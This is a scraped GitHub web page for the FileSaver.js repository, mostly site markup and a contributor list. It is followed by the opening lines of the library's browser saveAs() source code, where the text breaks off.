    <meta class="js-ga-set" name="dimension2" content="Header v3">
    <meta name="is-dotcom" content="true">
      <meta name="hostname" content="github.com">
    <meta name="user-login" content="">

    
    <link rel="icon" type="image/x-icon" href="https://assets-cdn.github.com/favicon.ico">


    <meta content="authenticity_token" name="csrf-param" />
<meta content="o6xjfz58SL+RHUF/JTfjI5GEI7eXQLPR0yCUsiBwgXdmzAUy4h1CgvkGRo3rwTqKrqTWVZMdB5fj78GZtS+PLg==" name="csrf-token" />

    <link href="https://assets-cdn.github.com/assets/github/index-cfbd527cae2c39b53795cf6a8e65d5557c7e24e3d56b67715f7ae15ea22357bf.css" media="all" rel="stylesheet" />
    <link href="https://assets-cdn.github.com/assets/github2/index-41e08359702e377d30a8255ab3b197f5f3365a9db813ea64b629ebd72ee7761a.css" media="all" rel="stylesheet" />
    
    


    <meta http-equiv="x-pjax-version" content="7fc176257d63090ee6378e931a73ea05">

      
  <meta name="description" content="FileSaver.js - An HTML5 saveAs() FileSaver implementation">
  <meta name="go-import" content="github.com/eligrey/FileSaver.js git https://github.com/eligrey/FileSaver.js.git">

  <meta content="46995" name="octolytics-dimension-user_id" /><meta content="eligrey" name="octolytics-dimension-user_login" /><meta content="2051226" name="octolytics-dimension-repository_id" /><meta content="eligrey/FileSaver.js" name="octolytics-dimension-repository_nwo" /><meta content="true" name="octolytics-dimension-repository_public" /><meta content="false" name="octolytics-dimension-repository_is_fork" /><meta content="2051226" name="octolytics-dimension-repository_network_root_id" /><meta content="eligrey/FileSaver.js" name="octolytics-dimension-repository_network_root_nwo" />
  <link href="https://github.com/eligrey/FileSaver.js/commits/master.atom" rel="alternate" title="Recent Commits to FileSaver.js:master" type="application/atom+xml">

  </head>


  <body class="logged_out  env-production linux vis-public page-blob">
    <a href="#start-of-content" tabindex="1" class="accessibility-aid js-skip-to-content">Skip to content</a>
    <div class="wrapper">
      
      
      


        
        <div class="header header-logged-out" role="banner">
  <div class="container clearfix">

    <a class="header-logo-wordmark" href="https://github.com/" data-ga-click="(Logged out) Header, go to homepage, icon:logo-wordmark">
      <span class="mega-octicon octicon-logo-github"></span>
    </a>

    <div class="header-actions" role="navigation">
        <a class="btn btn-primary" href="/join" data-ga-click="(Logged out) Header, clicked Sign up, text:sign-up">Sign up</a>
      <a class="btn" href="/login?return_to=%2Feligrey%2FFileSaver.js%2Fblob%2Fmaster%2FFileSaver.js" data-ga-click="(Logged out) Header, clicked Sign in, text:sign-in">Sign in</a>
    </div>

    <div class="site-search repo-scope js-site-search" role="search">
      <form accept-charset="UTF-8" action="/eligrey/FileSaver.js/search" class="js-site-search-form" data-global-search-url="/search" data-repo-search-url="/eligrey/FileSaver.js/search" method="get"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="&#x2713;" /></div>
  <label class="js-chromeless-input-container form-control">
    <div class="scope-badge">This repository</div>
    <input type="text"
      class="js-site-search-focus js-site-search-field is-clearable chromeless-input"
      data-hotkey="s"
      name="q"
      placeholder="Search"
      data-global-scope-placeholder="Search GitHub"
      data-repo-scope-placeholder="Search"
      tabindex="1"
      autocapitalize="off">
  </label>
</form>
    </div>

      <ul class="header-nav left" role="navigation">
          <li class="header-nav-item">
            <a class="header-nav-link" href="/explore" data-ga-click="(Logged out) Header, go to explore, text:explore">Explore</a>
          </li>
          <li class="header-nav-item">
            <a class="header-nav-link" href="/features" data-ga-click="(Logged out) Header, go to features, text:features">Features</a>
          </li>
          <li class="header-nav-item">
            <a class="header-nav-link" href="https://enterprise.github.com/" data-ga-click="(Logged out) Header, go to enterprise, text:enterprise">Enterprise</a>
          </li>
          <li class="header-nav-item">
            <a class="header-nav-link" href="/blog" data-ga-click="(Logged out) Header, go to blog, text:blog">Blog</a>
          </li>
      </ul>

  </div>
</div>



      <div id="start-of-content" class="accessibility-aid"></div>
          <div class="site" itemscope itemtype="http://schema.org/WebPage">
    <div id="js-flash-container">
      
    </div>
    <div class="pagehead repohead instapaper_ignore readability-menu">
      <div class="container">
        
<ul class="pagehead-actions">

  <li>
      <a href="/login?return_to=%2Feligrey%2FFileSaver.js"
    class="btn btn-sm btn-with-count tooltipped tooltipped-n"
    aria-label="You must be signed in to watch a repository" rel="nofollow">
    <span class="octicon octicon-eye"></span>
    Watch
  </a>
  <a class="social-count" href="/eligrey/FileSaver.js/watchers">
    137
  </a>

  </li>

  <li>
      <a href="/login?return_to=%2Feligrey%2FFileSaver.js"
    class="btn btn-sm btn-with-count tooltipped tooltipped-n"
    aria-label="You must be signed in to star a repository" rel="nofollow">
    <span class="octicon octicon-star"></span>
    Star
  </a>

    <a class="social-count js-social-count" href="/eligrey/FileSaver.js/stargazers">
      2,380
    </a>

  </li>

    <li>
      <a href="/login?return_to=%2Feligrey%2FFileSaver.js"
        class="btn btn-sm btn-with-count tooltipped tooltipped-n"
        aria-label="You must be signed in to fork a repository" rel="nofollow">
        <span class="octicon octicon-repo-forked"></span>
        Fork
      </a>
      <a href="/eligrey/FileSaver.js/network" class="social-count">
        470
      </a>
    </li>
</ul>

        <h1 itemscope itemtype="http://data-vocabulary.org/Breadcrumb" class="entry-title public">
          <span class="mega-octicon octicon-repo"></span>
          <span class="author"><a href="/eligrey" class="url fn" itemprop="url" rel="author"><span itemprop="title">eligrey</span></a></span><!--
       --><span class="path-divider">/</span><!--
       --><strong><a href="/eligrey/FileSaver.js" class="js-current-repository" data-pjax="#js-repo-pjax-container">FileSaver.js</a></strong>

          <span class="page-context-loader">
            <img alt="" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
          </span>

        </h1>
      </div><!-- /.container -->
    </div><!-- /.repohead -->

    <div class="container">
      <div class="repository-with-sidebar repo-container new-discussion-timeline  ">
        <div class="repository-sidebar clearfix">
            
<nav class="sunken-menu repo-nav js-repo-nav js-sidenav-container-pjax js-octicon-loaders"
     role="navigation"
     data-pjax="#js-repo-pjax-container"
     data-issue-count-url="/eligrey/FileSaver.js/issues/counts">
  <ul class="sunken-menu-group">
    <li class="tooltipped tooltipped-w" aria-label="Code">
      <a href="/eligrey/FileSaver.js" aria-label="Code" class="selected js-selected-navigation-item sunken-menu-item" data-hotkey="g c" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches /eligrey/FileSaver.js">
        <span class="octicon octicon-code"></span> <span class="full-word">Code</span>
        <img alt="" class="mini-loader" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
</a>    </li>

      <li class="tooltipped tooltipped-w" aria-label="Issues">
        <a href="/eligrey/FileSaver.js/issues" aria-label="Issues" class="js-selected-navigation-item sunken-menu-item" data-hotkey="g i" data-selected-links="repo_issues repo_labels repo_milestones /eligrey/FileSaver.js/issues">
          <span class="octicon octicon-issue-opened"></span> <span class="full-word">Issues</span>
          <span class="js-issue-replace-counter"></span>
          <img alt="" class="mini-loader" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
</a>      </li>

    <li class="tooltipped tooltipped-w" aria-label="Pull requests">
      <a href="/eligrey/FileSaver.js/pulls" aria-label="Pull requests" class="js-selected-navigation-item sunken-menu-item" data-hotkey="g p" data-selected-links="repo_pulls /eligrey/FileSaver.js/pulls">
          <span class="octicon octicon-git-pull-request"></span> <span class="full-word">Pull requests</span>
          <span class="js-pull-replace-counter"></span>
          <img alt="" class="mini-loader" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
</a>    </li>

      <li class="tooltipped tooltipped-w" aria-label="Wiki">
        <a href="/eligrey/FileSaver.js/wiki" aria-label="Wiki" class="js-selected-navigation-item sunken-menu-item" data-hotkey="g w" data-selected-links="repo_wiki /eligrey/FileSaver.js/wiki">
          <span class="octicon octicon-book"></span> <span class="full-word">Wiki</span>
          <img alt="" class="mini-loader" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
</a>      </li>
  </ul>
  <div class="sunken-menu-separator"></div>
  <ul class="sunken-menu-group">

    <li class="tooltipped tooltipped-w" aria-label="Pulse">
      <a href="/eligrey/FileSaver.js/pulse" aria-label="Pulse" class="js-selected-navigation-item sunken-menu-item" data-selected-links="pulse /eligrey/FileSaver.js/pulse">
        <span class="octicon octicon-pulse"></span> <span class="full-word">Pulse</span>
        <img alt="" class="mini-loader" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
</a>    </li>

    <li class="tooltipped tooltipped-w" aria-label="Graphs">
      <a href="/eligrey/FileSaver.js/graphs" aria-label="Graphs" class="js-selected-navigation-item sunken-menu-item" data-selected-links="repo_graphs repo_contributors /eligrey/FileSaver.js/graphs">
        <span class="octicon octicon-graph"></span> <span class="full-word">Graphs</span>
        <img alt="" class="mini-loader" height="16" src="https://assets-cdn.github.com/assets/spinners/octocat-spinner-32-e513294efa576953719e4e2de888dd9cf929b7d62ed8d05f25e731d02452ab6c.gif" width="16" />
</a>    </li>
  </ul>


</nav>

              <div class="only-with-full-nav">
                  
<div class="clone-url open"
  data-protocol-type="http"
  data-url="/users/set_protocol?protocol_selector=http&amp;protocol_type=clone">
  <h3><span class="text-emphasized">HTTPS</span> clone URL</h3>
  <div class="input-group js-zeroclipboard-container">
    <input type="text" class="input-mini input-monospace js-url-field js-zeroclipboard-target"
           value="https://github.com/eligrey/FileSaver.js.git" readonly="readonly">
    <span class="input-group-button">
      <button aria-label="Copy to clipboard" class="js-zeroclipboard btn btn-sm zeroclipboard-button tooltipped tooltipped-s" data-copied-hint="Copied!" type="button"><span class="octicon octicon-clippy"></span></button>
    </span>
  </div>
</div>

  
<div class="clone-url "
  data-protocol-type="subversion"
  data-url="/users/set_protocol?protocol_selector=subversion&amp;protocol_type=clone">
  <h3><span class="text-emphasized">Subversion</span> checkout URL</h3>
  <div class="input-group js-zeroclipboard-container">
    <input type="text" class="input-mini input-monospace js-url-field js-zeroclipboard-target"
           value="https://github.com/eligrey/FileSaver.js" readonly="readonly">
    <span class="input-group-button">
      <button aria-label="Copy to clipboard" class="js-zeroclipboard btn btn-sm zeroclipboard-button tooltipped tooltipped-s" data-copied-hint="Copied!" type="button"><span class="octicon octicon-clippy"></span></button>
    </span>
  </div>
</div>



<p class="clone-options">You can clone with
  <a href="#" class="js-clone-selector" data-protocol="http">HTTPS</a> or <a href="#" class="js-clone-selector" data-protocol="subversion">Subversion</a>.
  <a href="https://help.github.com/articles/which-remote-url-should-i-use" class="help tooltipped tooltipped-n" aria-label="Get help on which URL is right for you.">
    <span class="octicon octicon-question"></span>
  </a>
</p>




                <a href="/eligrey/FileSaver.js/archive/master.zip"
                   class="btn btn-sm sidebar-button"
                   aria-label="Download the contents of eligrey/FileSaver.js as a zip file"
                   title="Download the contents of eligrey/FileSaver.js as a zip file"
                   rel="nofollow">
                  <span class="octicon octicon-cloud-download"></span>
                  Download ZIP
                </a>
              </div>
        </div><!-- /.repository-sidebar -->

        <div id="js-repo-pjax-container" class="repository-content context-loader-container" data-pjax-container>

          

<a href="/eligrey/FileSaver.js/blob/babc6d9d8fc60e667ddeafb7a7d3b844ce761ab5/FileSaver.js" class="hidden js-permalink-shortcut" data-hotkey="y">Permalink</a>

<!-- blob contrib key: blob_contributors:v21:12bea141057f64a5c15d37917d3ca079 -->

<div class="file-navigation js-zeroclipboard-container">
  
<div class="select-menu js-menu-container js-select-menu left">
  <span class="btn btn-sm select-menu-button js-menu-target css-truncate" data-hotkey="w"
    data-master-branch="master"
    data-ref="master"
    title="master"
    role="button" aria-label="Switch branches or tags" tabindex="0" aria-haspopup="true">
    <span class="octicon octicon-git-branch"></span>
    <i>branch:</i>
    <span class="js-select-button css-truncate-target">master</span>
  </span>

  <div class="select-menu-modal-holder js-menu-content js-navigation-container" data-pjax aria-hidden="true">

    <div class="select-menu-modal">
      <div class="select-menu-header">
        <span class="select-menu-title">Switch branches/tags</span>
        <span class="octicon octicon-x js-menu-close" role="button" aria-label="Close"></span>
      </div>

      <div class="select-menu-filters">
        <div class="select-menu-text-filter">
          <input type="text" aria-label="Filter branches/tags" id="context-commitish-filter-field" class="js-filterable-field js-navigation-enable" placeholder="Filter branches/tags">
        </div>
        <div class="select-menu-tabs">
          <ul>
            <li class="select-menu-tab">
              <a href="#" data-tab-filter="branches" data-filter-placeholder="Filter branches/tags" class="js-select-menu-tab">Branches</a>
            </li>
            <li class="select-menu-tab">
              <a href="#" data-tab-filter="tags" data-filter-placeholder="Find a tag…" class="js-select-menu-tab">Tags</a>
            </li>
          </ul>
        </div>
      </div>

      <div class="select-menu-list select-menu-tab-bucket js-select-menu-tab-bucket" data-tab-filter="branches">

        <div data-filterable-for="context-commitish-filter-field" data-filterable-type="substring">


            <a class="select-menu-item js-navigation-item js-navigation-open selected"
               href="/eligrey/FileSaver.js/blob/master/FileSaver.js"
               data-name="master"
               data-skip-pjax="true"
               rel="nofollow">
              <span class="select-menu-item-icon octicon octicon-check"></span>
              <span class="select-menu-item-text css-truncate-target" title="master">
                master
              </span>
            </a>
        </div>

          <div class="select-menu-no-results">Nothing to show</div>
      </div>

      <div class="select-menu-list select-menu-tab-bucket js-select-menu-tab-bucket" data-tab-filter="tags">
        <div data-filterable-for="context-commitish-filter-field" data-filterable-type="substring">


        </div>

        <div class="select-menu-no-results">Nothing to show</div>
      </div>

    </div>
  </div>
</div>

  <div class="btn-group right">
    <a href="/eligrey/FileSaver.js/find/master"
          class="js-show-file-finder btn btn-sm empty-icon tooltipped tooltipped-s"
          data-pjax
          data-hotkey="t"
          aria-label="Quickly jump between files">
      <span class="octicon octicon-list-unordered"></span>
    </a>
    <button aria-label="Copy file path to clipboard" class="js-zeroclipboard btn btn-sm zeroclipboard-button tooltipped tooltipped-s" data-copied-hint="Copied!" type="button"><span class="octicon octicon-clippy"></span></button>
  </div>

  <div class="breadcrumb js-zeroclipboard-target">
    <span class='repo-root js-repo-root'><span itemscope="" itemtype="http://data-vocabulary.org/Breadcrumb"><a href="/eligrey/FileSaver.js" class="" data-branch="master" data-direction="back" data-pjax="true" itemscope="url"><span itemprop="title">FileSaver.js</span></a></span></span><span class="separator">/</span><strong class="final-path">FileSaver.js</strong>
  </div>
</div>


  <div class="commit file-history-tease">
    <div class="file-history-tease-header">
        <img alt="@eligrey" class="avatar" data-user="46995" height="24" src="https://avatars2.githubusercontent.com/u/46995?v=3&amp;s=48" width="24" />
        <span class="author"><a href="/eligrey" rel="author">eligrey</a></span>
        <time datetime="2015-05-07T22:16:34Z" is="relative-time">May 7, 2015</time>
        <div class="commit-title">
            <a href="/eligrey/FileSaver.js/commit/babc6d9d8fc60e667ddeafb7a7d3b844ce761ab5" class="message" data-pjax="true" title="Auto-prepend BOM in IE10+

The last commit fixes some BOM prepending issues but it doesn&#39;t actually
add support for IE. This commit adds full auto-prepend BOM support for
IE.">Auto-prepend BOM in IE10+</a>
        </div>
    </div>

    <div class="participation">
      <p class="quickstat">
        <a href="#blob_contributors_box" rel="facebox">
          <strong>10</strong>
           contributors
        </a>
      </p>
          <a class="avatar-link tooltipped tooltipped-s" aria-label="eligrey" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=eligrey"><img alt="@eligrey" class="avatar" data-user="46995" height="20" src="https://avatars0.githubusercontent.com/u/46995?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="minj" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=minj"><img alt="@minj" class="avatar" data-user="1035523" height="20" src="https://avatars0.githubusercontent.com/u/1035523?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="blakeembrey" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=blakeembrey"><img alt="@blakeembrey" class="avatar" data-user="1088987" height="20" src="https://avatars0.githubusercontent.com/u/1088987?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="jjuutila" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=jjuutila"><img alt="@jjuutila" class="avatar" data-user="435263" height="20" src="https://avatars0.githubusercontent.com/u/435263?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="Jimbly" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=Jimbly"><img alt="@Jimbly" class="avatar" data-user="774383" height="20" src="https://avatars2.githubusercontent.com/u/774383?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="mukarev" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=mukarev"><img alt="@mukarev" class="avatar" data-user="1408737" height="20" src="https://avatars3.githubusercontent.com/u/1408737?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="tmcw" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=tmcw"><img alt="@tmcw" class="avatar" data-user="32314" height="20" src="https://avatars0.githubusercontent.com/u/32314?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="floriangouy" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=floriangouy"><img alt="@floriangouy" class="avatar" data-user="1767167" height="20" src="https://avatars3.githubusercontent.com/u/1767167?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="eugene-ku" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=eugene-ku"><img alt="@eugene-ku" class="avatar" data-user="7567629" height="20" src="https://avatars0.githubusercontent.com/u/7567629?v=3&amp;s=40" width="20" /> </a>
    <a class="avatar-link tooltipped tooltipped-s" aria-label="XhmikosR" href="/eligrey/FileSaver.js/commits/master/FileSaver.js?author=XhmikosR"><img alt="@XhmikosR" class="avatar" data-user="349621" height="20" src="https://avatars1.githubusercontent.com/u/349621?v=3&amp;s=40" width="20" /> </a>


    </div>
    <div id="blob_contributors_box" style="display:none">
      <h2 class="facebox-header">Users who have contributed to this file</h2>
      <ul class="facebox-user-list">
          <li class="facebox-user-list-item">
            <img alt="@eligrey" data-user="46995" height="24" src="https://avatars2.githubusercontent.com/u/46995?v=3&amp;s=48" width="24" />
            <a href="/eligrey">eligrey</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@minj" data-user="1035523" height="24" src="https://avatars2.githubusercontent.com/u/1035523?v=3&amp;s=48" width="24" />
            <a href="/minj">minj</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@blakeembrey" data-user="1088987" height="24" src="https://avatars2.githubusercontent.com/u/1088987?v=3&amp;s=48" width="24" />
            <a href="/blakeembrey">blakeembrey</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@jjuutila" data-user="435263" height="24" src="https://avatars2.githubusercontent.com/u/435263?v=3&amp;s=48" width="24" />
            <a href="/jjuutila">jjuutila</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@Jimbly" data-user="774383" height="24" src="https://avatars0.githubusercontent.com/u/774383?v=3&amp;s=48" width="24" />
            <a href="/Jimbly">Jimbly</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@mukarev" data-user="1408737" height="24" src="https://avatars1.githubusercontent.com/u/1408737?v=3&amp;s=48" width="24" />
            <a href="/mukarev">mukarev</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@tmcw" data-user="32314" height="24" src="https://avatars2.githubusercontent.com/u/32314?v=3&amp;s=48" width="24" />
            <a href="/tmcw">tmcw</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@floriangouy" data-user="1767167" height="24" src="https://avatars1.githubusercontent.com/u/1767167?v=3&amp;s=48" width="24" />
            <a href="/floriangouy">floriangouy</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@eugene-ku" data-user="7567629" height="24" src="https://avatars2.githubusercontent.com/u/7567629?v=3&amp;s=48" width="24" />
            <a href="/eugene-ku">eugene-ku</a>
          </li>
          <li class="facebox-user-list-item">
            <img alt="@XhmikosR" data-user="349621" height="24" src="https://avatars3.githubusercontent.com/u/349621?v=3&amp;s=48" width="24" />
            <a href="/XhmikosR">XhmikosR</a>
          </li>
      </ul>
    </div>
  </div>

<div class="file">
  <div class="file-header">
    <div class="file-actions">

      <div class="btn-group">
        <a href="/eligrey/FileSaver.js/raw/master/FileSaver.js" class="btn btn-sm " id="raw-url">Raw</a>
          <a href="/eligrey/FileSaver.js/blame/master/FileSaver.js" class="btn btn-sm js-update-url-with-hash">Blame</a>
        <a href="/eligrey/FileSaver.js/commits/master/FileSaver.js" class="btn btn-sm " rel="nofollow">History</a>
      </div>


          <button type="button" class="octicon-btn disabled tooltipped tooltipped-n" aria-label="You must be signed in to make or propose changes">
            <span class="octicon octicon-pencil"></span>
          </button>

        <button type="button" class="octicon-btn octicon-btn-danger disabled tooltipped tooltipped-n" aria-label="You must be signed in to make or propose changes">
          <span class="octicon octicon-trashcan"></span>
        </button>
    </div>

    <div class="file-info">
        253 lines (246 sloc)
        <span class="file-info-divider"></span>
      7.956 kb
    </div>
  </div>
  
  <div class="blob-wrapper data type-javascript">
      <table class="highlight tab-size-8 js-file-line-container">
      <tr>
        <td id="L1" class="blob-num js-line-number" data-line-number="1"></td>
        <td id="LC1" class="blob-code blob-code-inner js-file-line"><span class="pl-c">/* FileSaver.js</span></td>
      </tr>
      <tr>
        <td id="L2" class="blob-num js-line-number" data-line-number="2"></td>
        <td id="LC2" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> * A saveAs() FileSaver implementation.</span></td>
      </tr>
      <tr>
        <td id="L3" class="blob-num js-line-number" data-line-number="3"></td>
        <td id="LC3" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> * 2015-05-07.2</span></td>
      </tr>
      <tr>
        <td id="L4" class="blob-num js-line-number" data-line-number="4"></td>
        <td id="LC4" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> *</span></td>
      </tr>
      <tr>
        <td id="L5" class="blob-num js-line-number" data-line-number="5"></td>
        <td id="LC5" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> * By Eli Grey, http://eligrey.com</span></td>
      </tr>
      <tr>
        <td id="L6" class="blob-num js-line-number" data-line-number="6"></td>
        <td id="LC6" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> * License: X11/MIT</span></td>
      </tr>
      <tr>
        <td id="L7" class="blob-num js-line-number" data-line-number="7"></td>
        <td id="LC7" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> *   See https://github.com/eligrey/FileSaver.js/blob/master/LICENSE.md</span></td>
      </tr>
      <tr>
        <td id="L8" class="blob-num js-line-number" data-line-number="8"></td>
        <td id="LC8" class="blob-code blob-code-inner js-file-line"><span class="pl-c"> */</span></td>
      </tr>
      <tr>
        <td id="L9" class="blob-num js-line-number" data-line-number="9"></td>
        <td id="LC9" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L10" class="blob-num js-line-number" data-line-number="10"></td>
        <td id="LC10" class="blob-code blob-code-inner js-file-line"><span class="pl-c">/*global self */</span></td>
      </tr>
      <tr>
        <td id="L11" class="blob-num js-line-number" data-line-number="11"></td>
        <td id="LC11" class="blob-code blob-code-inner js-file-line"><span class="pl-c">/*jslint bitwise: true, indent: 4, laxbreak: true, laxcomma: true, smarttabs: true, plusplus: true */</span></td>
      </tr>
      <tr>
        <td id="L12" class="blob-num js-line-number" data-line-number="12"></td>
        <td id="LC12" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L13" class="blob-num js-line-number" data-line-number="13"></td>
        <td id="LC13" class="blob-code blob-code-inner js-file-line"><span class="pl-c">/*! @source http://purl.eligrey.com/github/FileSaver.js/blob/master/FileSaver.js */</span></td>
      </tr>
      <tr>
        <td id="L14" class="blob-num js-line-number" data-line-number="14"></td>
        <td id="LC14" class="blob-code blob-code-inner js-file-line">
</td>
      </tr>
      <tr>
        <td id="L15" class="blob-num js-line-number" data-line-number="15"></td>
        <td id="LC15" class="blob-code blob-code-inner js-file-line"><span class="pl-k">var</span> saveAs <span class="pl-k">=</span> saveAs <span class="pl-k">||</span> (<span class="pl-k">function</span>(<span class="pl-smi">view</span>) {</td>
      </tr>
      <tr>
        <td id="L16" class="blob-num js-line-number" data-line-number="16"></td>
        <td id="LC16" class="blob-code blob-code-inner js-file-line">	<span class="pl-s"><span class="pl-pds">&quot;</span>use strict<span class="pl-pds">&quot;</span></span>;</td>
      </tr>
      <tr>
        <td id="L17" class="blob-num js-line-number" data-line-number="17"></td>
        <td id="LC17" class="blob-code blob-code-inner js-file-line">	<span class="pl-c">// IE &lt;10 is explicitly unsupported</span></td>
      </tr>
      <tr>
        <td id="L18" class="blob-num js-line-number" data-line-number="18"></td>
        <td id="LC18" class="blob-code blob-code-inner js-file-line">	<span class="pl-k">if</span> (<span class="pl-k">typeof</span> <span class="pl-c1">navigator</span> <span class="pl-k">!==</span> <span class="pl-s"><span class="pl-pds">&quot;</span>undefined<span class="pl-pds">&quot;</span></span> <span class="pl-k">&amp;&amp;</span><span class="pl-sr"> <span class="pl-pds">/</span>MSIE <span class="pl-c1">[<span class="pl-c1">1-9</span>]</span><span class="pl-cce">\.</span><span class="pl-pds">/</span></span>.<span class="pl-c1">test</span>(<span class="pl-c1">navigator</span>.<span class="pl-c1">userAgent</span>)) {</td>
      </tr>
      <tr>
        <td id="L19" class="blob-num js-line-number" data-line-number="19"></td>
        <td id="LC19" class="blob-code blob-code-inner js-file-line">		<span class="pl-k">return</span>;</td>
      </tr>
      <tr>
        <td id="L20" class="blob-num js-line-number" data-line-number="20"></td>
        <td id="LC20" class="blob-code blob-code-inner js-file-line">	}</td>
      </tr>
      <tr>
        <td id="L21" class="blob-num js-line-number" data-line-number="21"></td>
        <td id="LC21" class="blob-code blob-code-inner js-file-line">	<span class="pl-k">var</span></td>
      </tr>
      <tr>
        <td id="L22" class="blob-num js-line-number" data-line-number="22"></td>
        <td id="LC22" class="blob-code blob-code-inner js-file-line">		  doc <span class="pl-k">=</span> view.<span class="pl-c1">document</span></td>
      </tr>
      <tr>
        <td id="L23" class="blob-num js-line-number" data-line-number="23"></td>
        <td id="LC23" class="blob-code blob-code-inner js-file-line">		  <span class="pl-c">// only get URL when necessary in case Blob.js hasn&#39;t overridden it yet</span></td>
      </tr>
      <tr>
        <td id="L24" class="blob-num js-line-number" data-line-number="24"></td>
        <td id="LC24" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">get_URL</span> <span class="pl-k">=</span> <span class="pl-k">function</span>() {</td>
      </tr>
      <tr>
        <td id="L25" class="blob-num js-line-number" data-line-number="25"></td>
        <td id="LC25" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">return</span> view.<span class="pl-c1">URL</span> <span class="pl-k">||</span> view.webkitURL <span class="pl-k">||</span> view;</td>
      </tr>
      <tr>
        <td id="L26" class="blob-num js-line-number" data-line-number="26"></td>
        <td id="LC26" class="blob-code blob-code-inner js-file-line">		}</td>
      </tr>
      <tr>
        <td id="L27" class="blob-num js-line-number" data-line-number="27"></td>
        <td id="LC27" class="blob-code blob-code-inner js-file-line">		, save_link <span class="pl-k">=</span> doc.createElementNS(<span class="pl-s"><span class="pl-pds">&quot;</span>http://www.w3.org/1999/xhtml<span class="pl-pds">&quot;</span></span>, <span class="pl-s"><span class="pl-pds">&quot;</span>a<span class="pl-pds">&quot;</span></span>)</td>
      </tr>
      <tr>
        <td id="L28" class="blob-num js-line-number" data-line-number="28"></td>
        <td id="LC28" class="blob-code blob-code-inner js-file-line">		, can_use_save_link <span class="pl-k">=</span> <span class="pl-s"><span class="pl-pds">&quot;</span>download<span class="pl-pds">&quot;</span></span> <span class="pl-k">in</span> save_link</td>
      </tr>
      <tr>
        <td id="L29" class="blob-num js-line-number" data-line-number="29"></td>
        <td id="LC29" class="blob-code blob-code-inner js-file-line">		, <span class="pl-en">click</span> <span class="pl-k">=</span> <span class="pl-k">function</span>(<span class="pl-smi">node</span>) {</td>
      </tr>
      <tr>
        <td id="L30" class="blob-num js-line-number" data-line-number="30"></td>
        <td id="LC30" class="blob-code blob-code-inner js-file-line">			<span class="pl-k">var</span> <span class="pl-c1">event</span> <span class="pl-k">=</span> doc.createEvent(<span class="pl-s"><span class="pl-pds">&quot;</span>MouseEvents<span class="pl-pds">&quot;</span></span>);</td>
      </tr>
      <tr>
        <td id="L31" class="blob-num js-line-number" data-line-number="31"></td>
        <td id="LC31" class="blob-code blob-code-inner js-file-line">			<span class="pl-c1">event</span>.initMouseEvent(</td>
      </tr>
      <tr>
        <td id="L32" class="blob-num js-line-number" data-line-number="32"></td>
        <td id="LC32" class="blob-code blob-code-inner js-file-line">				<span class="pl-s"><span class="pl-pds">&quot;</span>click<span class="pl-pds">&quot;</span></span>, <span class="pl-c1">true</span>, <span class="pl-c1">false</span>, view, <span class="pl-c1">0</span>, <span class="pl-c1">0</span>, <span class="pl-c1">0</span>, <span class="pl-c1">0</span>, <span class="pl-c1">0</span></td>
      </tr>
      <tr>
        <td id="L33" class="blob-num js-line-number" data-line-number="33"></td>
        <td id="LC33" class="blob-code blob-code-inner js-file-line">				, <span class="pl-c1">false</span>, <span class="pl-c1">false</span>, <span class="pl-c1">false</span>, <span class="pl-c1">false</span>, <span class="pl-c1">0</span>, <span class="pl-c1">null</span></td>
